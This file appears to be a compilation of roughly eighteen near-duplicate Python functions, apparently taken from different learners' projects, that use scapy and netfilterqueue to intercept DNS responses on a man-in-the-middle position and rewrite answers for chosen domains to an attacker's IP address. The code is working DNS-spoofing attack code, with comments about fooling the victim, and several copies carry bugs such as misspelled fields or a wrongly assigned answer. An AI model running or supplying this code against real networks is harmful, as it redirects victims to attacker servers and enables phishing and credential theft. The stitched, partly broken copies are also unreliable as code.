def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) #converting the packet to a scpay packet by wraping the payload of # the packet with a scapy ip layer so as to access the data of the packet by using print(scapy_packet.show() if scapy_packet.haslayer(scapy.DNSRR): #we only want to work on the DNS layer and modify the responses of the DNS server #so we receive the request from the target computer(by becoming the man in the middle) and then forward it to the DNS server #wait for response from the DNS server and modify it to whatever website we want(maybe to a hacker server). In order to specify #DNS responses we use scapy.DNSRR(RR: Response Record) and if we wanted to specify the DNS requests we use scapy.DNSQR(QR: Question Record) qname = scapy_packet[scapy.DNSQR].qname if "www.google.com" in qname: print("[+] Spoofing target") answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.15") scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 # The original count of answers maybe of any value but we are only sending one answer hence we set it equal to one. del scapy_packet[scapy.IP].len # the length layer specifies the size of the layer and the chksum is used to make sure that the packet has del scapy_packet[scapy.IP].chksum # not been modified and to make sure that these values do not corrupt our scapy packet we deleter these fields del scapy_packet[scapy.UDP].chksum # and then scapy automatically re-calculate these fields according to our modified packet before it gets sent del scapy_packet[scapy.UDP].len #print(scapy_packet.show()) #packet will get printed with its layers with the help of the .show() method just like we used this method on the packets sniffed with scapy packet.set_payload(str(scapy_packet)) # Here we typecast our scapy packet to a string because we at first converted the packet # to a scapy packet so as to print its layers and modify it accordingly also, if we print our original packet we will just get # a string of data inside this packet and we will not be able to access the layers nicely the same way that we do with the scapy packet. packet.accept()
def process_packet(packet): global TARGET_SITE global REDIRECT_SITE scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname #if TARGET_SITE in str(qname): #python 3 if TARGET_SITE in qname: #python 2 print("[+] Target site requested. - Spoofing to : "+REDIRECT_SITE) answer = scapy.DNSRR(rrname = qname, rdata = REDIRECT_SITE) scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 if scapy_packet.haslayer(scapy.IP): if scapy_packet[scapy.IP].len: del scapy_packet[scapy.IP].len if scapy_packet[scapy.IP].chksum: del scapy_packet[scapy.IP].chksum if scapy_packet.haslayer(scapy.UDP): if scapy_packet[scapy.UDP].len: del scapy_packet[scapy.UDP].len if scapy_packet[scapy.UDP].chksum: del scapy_packet[scapy.UDP].chksum packet.set_payload(str(scapy_packet)) #python 2 #packet.set_payload(str(scapy_packet).encode()) #python 3 packet.accept()
def process_packet(packet): # print(packet) scapy_packet = scapy.IP(packet.get_payload()) # print(scapy_packet) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if "bing.com" in qname: print("[+] Spoofing target") answer = scapy.DNSRR(rrname=qname, rdata=kali_ip) # an is the number of DNS redirect in packet scapy_packet[scapy.DNS].an = answer # ancount is the number of DNS redirect in packet scapy_packet[scapy.DNS].ancount = 1 # scapy rebuild this field automaticly if we delete # len of the IP part and a security chksum to know if we change it del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum # len of the UDP part and a security chksum to know if we change it del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum packet.set_payload(str(scapy_packet)) # print(scapy_packet.show()) packet.accept()
def process_pkt(packet): """The call back function form queue.bind on line 43""" target_url = domain #Converting the netfilter packet to a scapy packet scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer( scapy.DNSRR): #If that packet has the payer of DNSResponse qname = scapy_packet[ scapy. DNSQR].qname #Taking the query that the target made from the DNSOuery if target_url in str(qname): print('[+] Spoofing for ' + target_url + ' as ' + redirection) answer = scapy.DNSRR( rrname=qname, rdata=redirection) #Making a pkt to send for spoofing scapy_packet[ scapy. DNS].an = answer #Replacing the answer layer with the layer we created""" scapy_packet[ scapy.DNS].ancount = 1 #Removing the answer count in the pkt #Removing the stuff that will cause errors in our pkt on the receiver del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum #All this will be recalculated by scapy packet.set_payload( bytes(scapy_packet)) #Setting the payload in the original pkt packet.accept() #Forwarding the payload pkt
def process_packet(packet): # si imprimimos lo del metodo get_payload muestra mas info parecida a usar scapy scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if "www.vulnweb.com" in str(qname): print("[+] Spoofing target") # print(scapy_packet.show()) # Modificamos los valores primero el response y asignamos el qname que se obtuvo es decir # la pagina que suplantaremos. # Y modificalos el campo rdata a la nueva ip que designaremos en el dns # Modifica el paquete para ver cada campo y como modificarlo se puede ver en el show answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.11") scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 # Los valores de cheksum se aseguran que no hayan sido modificados los paquetes # Si son removidos scapy automaticamente genera esos paquetes :) del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len # Convertimos el packete scapy a un str y eso se lo damos al packet packet.set_payload(bytes(scapy_packet)) # sino se aceptan no pasaran de la cola si estan siendo interceptados # se puede hacer un drop y le denegaremos el acceso a internet packet.accept()
def process_packet(packet): ''' packet.accept() accept the packet and connection throw packet.drop() cut the internet connection :) packet.get_payload() show all info about packet like scapy but we need scapy to add packet to it because i need to deal with this packet as snifft ''' # here we add packet to IP layer in scapy scapy_packet = scapy.IP(packet.get_payload()) # DNSRQ dns request, DNSRR dns response if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if site_dns_attack in str(qname): print('[+] Spoofing target') answer = scapy.DNSRR(rrname=qname, rdata=fack_site) # change answer scapy_packet[scapy.DNS].an = answer # change count of answer to 1 because we add one answer scapy_packet[scapy.DNS].ancount = 1 # delete all feild can interrubt our answer and scapy will return calc it and add it del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len # add our modified to the orginal packet packet.set_payload(bytes(scapy_packet)) # accept the packet and make it throw :) packet.accept()
def process_packet(packet): # print(packet.get_payload()) # We will need to be able to convert the packet.get_payload to a scapy packet # to modify and analyze specific layers that we want and send the requests and # responses that we want scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if "www.bing.com" in qname: print("[+] Spoofing target") answer = scapy.DNSRR(rrname=qname, rdata="192.168.1.113") scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 # We remove the cheksum and len so the packet is able to recalculate both fields del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.IP].len del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len # If we convert the packet we will be able to convert the original packet to the modificated one packet.set_payload(str(scapy_packet)) # print(scapy_packet.show()) packet.accept()
def process_packet(packet): # convert the packets into scapy packets and analyse the IP headers scapy_packet = scapy.IP(packet.get_payload()) # if this packet is DNS response type if scapy_packet.haslayer(scapy.DNSRR): # put this packet into a variable qname = scapy_packet[scapy.DNSQR].qname # if this qname response has the specific site if "www.itmix.gr" in qname: print("[+] Spoofing target") # fool the victim and modify attributes of the packet with changed IP (THE ONE OF THE ATTACKER) answer = scapy.DNSRR(rrname=qname, rdata="192.168.22.7") # set the answer variable as a dns response scapy_packet[scapy.DNS].an = answer # set only one answer scapy_packet[scapy.DNS].ancount = 1 # delete the attributes that check the originality of communication del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len # set the scapy packet (modified packet) as the main packet packet.set_payload(str(scapy_packet)) # show the packets general view # print(scapy_packet.show()) # accept or drop the packets of the queue packet.accept()
def process_packet(packet): scapy_packet = scapy.IP( packet.get_payload() ) # Give scapy the payload of the packet. Converted the packet to a scapy packet. # Modify the scapy packet. if scapy_packet.haslayer( scapy.DNSRR ): # if the packet has a layer for DNS Response DNSRR (DNS Query is DNSRQ). We're looking for DND response. qname = scapy_packet[scapy.DNSQR].qname if "www.digg.com" in qname: print("[+] Spoofing Target! ") answer = scapy.DNSRR( rrname=qname, rdata="172.16.61.208" ) # We have apache server running on Kali machine @ 172.16.61.207 service apache2 start and query name is "www.bing.com" here scapy_packet[ scapy. DNS].an = answer # Modify scapy packet to the correct answer. scapy_packet[scapy.DNS].ancount = 1 # Modify answer count # The packets has length and chcksum field. That might corrupt our created packet. We'll simply delete chcksum and len field for IP and UDP and make scapy calculate it for us. del scapy_packet[scapy.IP].len del scapy_packet[scapy.UDP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum packet.set_payload( str(scapy_packet) ) # Convert back the scapy_packet to a normal string and then give it back to the actual packet. packet.accept() # accept() will simply forward the packet
def captured_packet(packet): packet_cap = scapy.IP(packet.get_payload()) if packet_cap.haslayer(scapy.DNSRR): qname = packet_cap[scapy.DNSQR].qname if "www.bing.com" in qname: print("[+] spoofing the target") answer = scapy.DNSRR(rrname=qname, rdata="192.168.8.1") packet_cap[scapy.DNS].qname = answer packet_cap[scapy.DNS].ancount = 1 del packet_cap[scapy.IP].chksum del packet_cap[scapy.Ip].len del packet_cap[scapy.UDP].len del packet_cap[scapy.UDP].chksum packet.set_payload(str(packet_cap)) packet.accept()
def process_packet(packet): scapy_packet = scapy.IP( packet.get_payload() ) # We converted it to scapy to allow us to access it's layers as the normal DNS packet is only string not layers if scapy_packet.haslayer( scapy.DNSRR ): # DNSRR stands for DNS Resource Record which is a DNS response qname = scapy_packet[scapy.DNSQR].qname if "www.bing.com".encode() in qname: print('[+] Spoofing target') website = "192.169.1.111" answer = scapy.DNSRR(rrname=qname, rdata=website) scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[ scapy. IP].len # We remove them and scapy will automatically calculate them while sending the new packet containing the modified answers del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum packet.set_payload( str(scapy_packet) ) # We returned it using string to return it to its original state packet.accept()
def process_packet(packet): #setting a variable named scapy_packet equal to the ip layer packet response scapy_packet = scapy.IP(packet.get_payload()) #DNSRR is the DNS response. If our packet has a DNS response in it and the qname(website name) has 'www.bing.com' in #it, print our text and modify the packet using the ip address of the web host we want to spoof. if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if "www.bing.com" in qname: print("[+] Spoofing target") answer = scapy.DNSRR(rrname=qname, rdata="45.58.116.198") #modifies the packet so it uses our answer scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 #removing these values from our packet response so scapy will auto populate them with the correct values #based on our response del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len packet.set_payload(str(scapy_packet)) packet.accept()
def capture_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) try: b_qname = scapy_packet[scapy.DNSQR].qname qname = b_qname.decode('utf-8') except IndexError: pass if scapy_packet.haslayer(scapy.DNSRR): if website in str(qname): print(Fore.CYAN + Style.BRIGHT + "[*]" + Fore.LIGHTWHITE_EX + Style.BRIGHT + " Redirecting " + str(qname) + " to " + redirect_ip) answer_packet = scapy.DNSRR(rrname=b_qname, rdata=redirect_ip) scapy_packet[scapy.DNS].an = answer_packet scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[ scapy.IP].chksum # avoiding chksum error for IP Layer del scapy_packet[scapy.IP].len # avoiding len error for IP Layer del scapy_packet[ scapy.UDP].chksum # avoiding chksum error for UDP Layer del scapy_packet[scapy.UDP].len # avoiding len error for UDP Layer packet.set_payload(bytes(scapy_packet)) # setting altered packet packet.accept()
def process_packet(packet): #print(packet) #print(packet.get_payload()) # Getting payload scapy_packet = scapy.IP(packet.get_payload()) # Coverting the packet to scapy packet so that we can interact with them. if scapy_packet.haslayer(scapy.DNSRR): # Finding the DNS for specific site qname = scapy_packet[scapy.DNSQR].qname # DNSQR is Question Record for DNS # DNSRQ is for DNS Request and for DNS Response we use DNSRR #if "www.vulnweb.com" in str(qname): if target_website in qname: print("[+] Spoofing Target ") #answer = scapy.DNSRR(rrname = qname, rdata = "85.128.197.105") # Modifying the DNS Record answer = scapy.DNSRR(rrname = qname, rdata = destination_website) #print(scapy_packet.show()) scapy_packet[scapy.DNS].an = answer # Implementing the changes scapy_packet[scapy.DNS].ancount = 1 # Modifing ancount(answer count to 1) # Removing the following items so that they can't corrupt our modified packet # Scapy will automatically calculate these according to our modified packet del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum packet.set_payload(str(scapy_packet)) #packet.payload = scapy_packet.payload #packet[DNS] = scapy_packet[DNS] packet.accept()
def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if "namepage" in qname: print("[+] Spoofing target") response = scapy.DNSRR(rrname=qname, rdata="10.0.2.15") scapy_packet[scapy.DNS].an = response scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum print(scapy_packet.show()) packet.set_payload(str(scapy_packet)) print("VA A ACEPTAR EL PACKET") packet.accept() print("HA ACEPTADO EL PACKET") else: packet.accept()
def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(http.HTTPRequest): if scapy_packet[scapy.TCP].dport == 80: url = "User at ip " + str( scapy_packet[scapy.IP].src) + " Accessed: " + str( scapy_packet[http.HTTPRequest].Host ) #+ str(scapy_packet[http.HTTPRequest].Path) #print(url) write_log(url) if scapy_packet.haslayer(scapy.DNSRR): website_requested = scapy_packet[scapy.DNSQR].qname.decode() for name in blocked_websites: if name in website_requested: print("[+] Blocking Website:", website_requested) answer = scapy.DNSRR(rrname=website_requested, rdata="10.0.2.14") scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len packet.set_payload(bytes(scapy_packet)) packet.accept()
def process_packet(packet): print(packet) print(packet.get_payload()) # needs to be converted to a scapy packet scapy_packet = scapy.IP(packet.get_payload()) # wraps the packet into IP layer if scapy_packet.haslayer(scapy.DNSRR): # check packet fields list => DNSRR stands for dns response record qname = scapy_packet[scapy.DNSRR].qname # syntax => var[module.field].subfield if url.encode() in qname: answer = scapy.DNSRR(rrname=qname, rdata=attacker_ip) # creates a DNSRR response to be send to the # target machine scapy_packet[scapy.DNS].an = answer # sets payload to forged package scapy_packet[scapy.DNS].ancount = 1 # check pcks sent and match num with correct value # deletes the fields chksum and len outta each layer, scapy will recalculate them # without it it wont work del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.IP].len del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum packet.set_payload(bytes(scapy_packet)) # modifies original package with forged one # print(scapy_packet.show()) # packet.drop() # choose what to do and uncomment packet.accept() # choose what to do and uncomment
def process_packet(packet): # print(packet) # read data inside of packets scapy_packet = scapy.IP(packet.get_payload()) # converted into scapy packet if scapy_packet.haslayer(scapy.DNSRR): # DNS Resource Record # print(scapy_packet.show()) qname = scapy_packet[scapy.DNSQR].qname if "www.bing.com" in qname: print("[+] Spoofing target") answer = scapy.DNSRR(rrname=qname, rdate="192.168.2.106") # manipulate DNSRR segment which has type A domain scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 # modify ancount (deals with other dns packets) del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum # checksum checks if the packet has been modified # deleting them allows scapy to re-calculate chksum value #set payload to Packets packet.set_payload(str(scapy_packet)) # put it back to a normal string (we converted into scapy packet at the beginning) packet.accept() # forwarding packets to its destination